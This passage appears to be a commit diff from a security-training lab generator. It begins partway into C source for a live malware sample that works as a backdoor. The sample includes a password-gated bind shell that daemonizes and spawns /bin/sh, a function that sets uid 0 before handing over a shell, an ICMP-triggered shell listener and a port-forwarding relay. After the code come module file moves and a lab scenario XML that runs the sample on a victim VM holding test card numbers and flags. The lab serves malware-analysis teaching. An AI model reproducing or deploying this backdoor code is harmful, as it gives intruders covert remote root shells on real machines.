if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(port);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
testtime.tv_sec = TIMEOUT;
testtime.tv_usec = 0;
alarm(TIMEOUT);
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
alarm(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0)
{
write(soc_cli, GIVEPASS, strlen(GIVEPASS));
recv(soc_cli, passwd, sizeof(passwd), 0);
for (i = 0; i < strlen(passwd); i++)
{
if (passwd[i] == '\n' || passwd[i] == '\r')
{
passwd[i] = '\0';
}
}
if (strcmp(passwd, $GNUPLIB) != 0)
{
close(soc_cli);
close(soc_rc);
exit(-1);
}
write(soc_cli, _$PRINT, strlen(_$PRINT));
for (i = 0; i < 3; i++)
{
dup2(soc_cli, i);
}
execl("/bin/sh","sh",(char *)0);
close(soc_cli);
close(soc_rc);
exit(1);
}
close(soc_cli);
close(soc_rc);
exit(0);
}
int get_shell(int fd)
{
int i;
setuid(0);
setgid(0);
chdir("/tmp");
write(fd, _$PRINT, strlen(_$PRINT));
for (i = 0; i < 3; i++)
{
dup2(fd, i);
}
execl("/bin/sh","sh",(char *)0);
close(fd);
return 1;
}
int icmp_shell()
{
int i, s, size, fromlen, port = ICMP_PORT;
char pkt[4096];
struct protoent *proto;
struct sockaddr_in from;
proto = getprotobyname("icmp");
if((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0)
exit(0);
while(1)
{
do
{
fromlen = sizeof(from);
if((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *)&from, &fromlen)) < 0)
printf("", size - 28);
}while(size != SIZEPACK + 28);
switch(fork())
{
case -1:
continue;
case 0:
bind_shell(port);
exit (0);
}
}
return 1;
}
int socks(int listenp, char *targeth, int targetp)
{
int listfd, outside, inside, size;
pthread_t thread1;
struct sockaddr_in client;
if(!(listfd = create_socket())) exit(1);
if(!(create_serv(listfd, listenp))) exit(1);
for(;;)
{
size = sizeof(struct sockaddr);
if((outfd = accept(listfd, (struct sockaddr *)&client, &size)) < 0)
{
continue;
}
if(!(infd=create_socket())) exit(1);
if(!(client_connect(infd, targeth, targetp))) quit(outfd, infd, listfd);
maxfd = max(outfd, infd) + 1;
pthread_create(&thread1, NULL, (void *)&out2in, NULL);
}
close(listfd);
}
int create_socket()
{
int sockfd;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0))<0)
{
return(0);
}
return(sockfd);
}
int create_serv(int sockfd, int port)
{
struct sockaddr_in srvaddr;
bzero(&srvaddr, sizeof(struct sockaddr));
srvaddr.sin_port = htons(port);
srvaddr.sin_family = AF_INET;
srvaddr.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(sockfd, (struct sockaddr *)&srvaddr, sizeof(struct sockaddr))<0)
{
return(0);
}
if(listen(sockfd,CONNECT_NUMBER)<0)
{
return(0);
}
return(1);
}
int client_connect(int sockfd, char *server, int port)
{
struct sockaddr_in cliaddr;
struct hostent *host;
if(!(host = gethostbyname(server)))
{
return(0);
}
bzero(&cliaddr, sizeof(struct sockaddr));
cliaddr.sin_family = AF_INET;
cliaddr.sin_port = htons(port);
cliaddr.sin_addr = *((struct in_addr *)host->h_addr);
if(connect(sockfd, (struct sockaddr *)&cliaddr, sizeof(struct sockaddr)) < 0)
{
return(0);
}
return(1);
}
int quit(int a, int b, int c)
{
close(a);
close(b);
close(c);
exit(1);
}
void out2in()
{
struct timeval timeset;
fd_set readfd, writefd;
int result, i = 0;
char read_in1[MAXSIZE], send_out1[MAXSIZE];
char read_in2[MAXSIZE], send_out2[MAXSIZE];
int read1 = 0, totalread1 = 0, send1=0;
int read2 = 0, totalread2 = 0, send2=0;
int out_fd, in_fd;
out_fd = outfd;
in_fd = infd;
bzero(read_in1, MAXSIZE);
bzero(read_in2, MAXSIZE);
bzero(send_out1, MAXSIZE);
bzero(send_out2, MAXSIZE);
timeset.tv_sec = TIMEOUT;
timeset.tv_usec = 0;
while(1)
{
FD_ZERO(&readfd);
FD_ZERO(&writefd);
FD_SET(out_fd, &readfd);
FD_SET(in_fd, &writefd);
FD_SET(out_fd, &writefd);
FD_SET(in_fd, &readfd);
result = select(maxfd, &readfd, &writefd, NULL, NULL);
if(result < 0)
{
return;
}
else
if(result == 0)
{
return;
}
if(FD_ISSET(out_fd, &readfd))
{
read1 = recv(out_fd, read_in1, MAXSIZE, 0);
if(read1 == 0) break;
if(read1 < 0)
{
return;
}
memcpy(send_out1 + totalread1, read_in1, read1);
totalread1 += read1;
bzero(read_in1, MAXSIZE);
}
if(FD_ISSET(in_fd, &writefd))
{
while(totalread1 > 0)
{
send1 = write(in_fd, send_out1, totalread1);
if(send1 == 0)break;
if(send1 < 0)
{
continue;
}
totalread1 -= send1;
}
bzero(send_out1, MAXSIZE);
}
if(FD_ISSET(in_fd, &readfd))
{
read2 = recv(in_fd, read_in2, MAXSIZE, 0);
if(read2 == 0) break;
if(read2 < 0)
{
return;
}
memcpy(send_out2 + totalread2, read_in2, read2);
totalread2 += read2;
bzero(read_in2, MAXSIZE);
}
if(FD_ISSET(out_fd, &writefd))
{
while(totalread2 > 0)
{
send2 = write(out_fd, send_out2, totalread2);
if(send2 == 0) break;
if(send2 < 0)
{
continue;
}
totalread2 -= send2;
}
bzero(send_out2, MAXSIZE);
}
}
close(out_fd);
close(in_fd);
return;
}
char x2c(char *what)
{
register char digit;
digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0'));
digit *= 16;
digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0'));
return (digit);
}
void unescape_url(char *url)
{
register int x, y;
for(x = 0 , y = 0; url[y]; ++x, ++y)
{
if((url[x] = url[y]) == '%')
{
url[x] = x2c(&url[y + 1]);
y += 2;
}
}
url[x] = '\0';
}
void plustospace(char *str)
{
register int x;
for(x = 0; str[x]; x++)
if (str[x] == '+')
str[x] = ' ';
}

0
modules/utilities/unix/live_malware_samples/live_malware_samples.pp → modules/utilities/unix/malware/live_malware_samples/live_malware_samples.pp
View File

0
modules/utilities/unix/live_malware_samples/manifests/install.pp → modules/utilities/unix/malware/live_malware_samples/manifests/install.pp
View File

2
modules/utilities/unix/live_malware_samples/secgen_metadata.xml → modules/utilities/unix/malware/live_malware_samples/secgen_metadata.xml
View File

@@ -14,6 +14,6 @@
<platform>linux</platform>
<requires>
<module_path>.*/git$</typemodule_path>
<module_path>.*/git</module_path>
</requires>
</utility>

233
scenarios/labs/software_and_malware_analysis/11_coconut.xml Normal file
View File

@@ -0,0 +1,233 @@
<?xml version="1.0"?>
<scenario xmlns="http://www.github/cliffe/SecGen/scenario"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/scenario">
<name>Malware Behaviour: Live Sample Analysis</name>
<author>Tom Shaw</author>
<author>Mo Hassan</author>
<description>A Hackerbot lab involving the analysis of a live malware sample.</description>
<type>hackerbot-lab</type>
<type>ctf-lab</type>
<type>lab-sheet</type>
<difficulty>intermediate</difficulty>
<CyBOK KA="MAT" topic="Malware Taxonomy">
<keyword>dimensions</keyword>
<keyword>kinds</keyword>
</CyBOK>
<CyBOK KA="MAT" topic="Malware Analysis">
<keyword>analysis techniques</keyword>
<keyword>analysis environments</keyword>
</CyBOK>
<system>
<system_name>desktop</system_name>
<base platform="linux" type="desktop" distro="Buster"/>
<input into_datastore="IP_addresses">
<value>172.16.0.2</value>
<value>172.16.0.3</value>
<value>172.16.0.4</value>
</input>
<input into_datastore="spoiler_admin_pass">
<generator type="strong_password_generator"/>
</input>
<utility module_path=".*/reversing_tools"/>
<utility module_path=".*/ghidra"/>
<utility module_path=".*/parameterised_accounts">
<input into="accounts" into_datastore="account">
<generator type="account">
<input into="username">
<generator type="random_sanitised_word">
<input into="wordlist">
<value>mythical_creatures</value>
</input>
</generator>
</input>
<input into="password">
<value>tiaspbiqe2r</value>
</input>
<input into="super_user">
<value>true</value>
</input>
</generator>
</input>
</utility>
<utility module_path=".*/kde_minimal">
<input into="autologin_user">
<datastore access="0" access_json="['username']">account</datastore>
</input>
<input into="accounts">
<datastore>account</datastore>
</input>
<input into="autostart_konsole">
<value>true</value>
</input>
</utility>
<utility module_path=".*/handy_cli_tools"/>
<utility module_path=".*/hash_tools"/>
<utility module_path=".*/coconut">
<input into="account">
<datastore>account</datastore>
</input>
<input into="run_sample">
<value>false</value>
</input>
<input into="coconut_config" into_datastore="coconut_config">
<generator type="coconut_config"/>
</input>
</utility>
<utility module_path=".*/handy_cli_tools"/>
<utility module_path=".*/nmap"/>
<utility module_path=".*/iceweasel">
<input into="accounts">
<datastore>account</datastore>
</input>
<input into="autostart">
<value>true</value>
</input>
<input into="start_page">
<datastore access="1">IP_addresses</datastore>
</input>
</utility>
<utility module_path=".*/pidgin">
<input into="server_ip">
<datastore access="1">IP_addresses</datastore>
</input>
<input into="accounts">
<datastore access="0">account</datastore>
</input>
</utility>
<vulnerability module_path=".*/ssh_root_login">
<input into="root_password">
<datastore>spoiler_admin_pass</datastore>
</input>
</vulnerability>
<network type="private_network">
<input into="IP_address">
<datastore access="0">IP_addresses</datastore>
</input>
</network>
<build type="cleanup">
<input into="root_password">
<datastore>spoiler_admin_pass</datastore>
</input>
</build>
</system>
<system>
<system_name>hb_server</system_name>
<base distro="Kali" name="MSF"/>
<service type="ircd"/>
<utility module_path=".*/nmap"/>
<utility module_path=".*/handy_cli_tools"/>
<service type="httpd"/>
<utility module_path=".*/hackerbot">
<input into="hackerbot_configs">
<generator module_path=".*/rema_coconut">
<input into="accounts">
<datastore>account</datastore>
</input>
<input into="root_password">
<datastore>spoiler_admin_pass</datastore>
</input>
<input into="desktop_ip">
<datastore access="0">IP_addresses</datastore>
</input>
<input into="hackerbot_server_ip">
<datastore access="1">IP_addresses</datastore>
</input>
<input into="victim_server_ip">
<datastore access="2">IP_addresses</datastore>
</input>
<input into="coconut_config">
<datastore>coconut_config</datastore>
</input>
</generator>
</input>
</utility>
<network type="private_network">
<input into="IP_address">
<datastore access="1">IP_addresses</datastore>
</input>
</network>
<build type="cleanup">
<input into="root_password">
<datastore>spoiler_admin_pass</datastore>
</input>
</build>
</system>
<system>
<system_name>victim_server</system_name>
<base platform="linux" type="desktop" distro="Buster"/>
<utility module_path=".*/parameterised_accounts">
<input into="accounts" into_datastore="infected_account">
<generator type="account">
<input into="username">
<value>infected</value>
</input>
<input into="password">
<generator type="strong_password_generator"/>
</input>
<input into="super_user">
<value>false</value>
</input>
<input into="leaked_filenames">
<value>top_secret_file</value>
<value>flag</value>
</input>
<input into="strings_to_leak">
<value>Visa 4111 1111 1111 1111
American Express 3400 0000 0000 009
Diner's Club 3000 0000 0000 04</value>
<generator type="flag_generator"/>
</input>
</generator>
</input>
</utility>
<utility module_path=".*/coconut">
<input into="account">
<datastore>infected_account</datastore>
</input>
<input into="run_sample">
<value>true</value>
</input>
<input into="coconut_config">
<datastore>coconut_config</datastore>
</input>
</utility>
<network type="private_network">
<input into="IP_address">
<datastore access="2">IP_addresses</datastore>
</input>
</network>
<build type="cleanup">
<input into="root_password">
<datastore>spoiler_admin_pass</datastore>
</input>
</build>
</system>
</scenario>